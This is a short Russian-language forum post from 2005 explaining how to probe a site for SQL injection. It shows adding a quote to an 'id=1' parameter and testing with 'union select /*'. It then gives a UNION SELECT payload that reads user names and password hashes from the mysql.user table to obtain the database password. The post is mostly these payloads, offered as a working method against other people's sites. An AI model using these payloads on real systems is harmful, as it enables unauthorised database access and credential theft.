Показать сообщение отдельно

  #21  
Старый 08.07.2005, 14:25
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию

после..
id=1'
далее если ковычка проканала, пишем запрос:
union select /*
достаточно это строчки для проверки инъекции. Если будет ошибка о несовмадении атрибутов селекта, то ты на правильном пути. =)
далее можно составить примерно такой запрос:
union select null,user,password from mysql.user/*
ну а там дальше видно будет проканает или нет). Но это как 1 из вариантов узнать пасс БД. Главное, чтобы инъекция была.. =)
 
Ответить с цитированием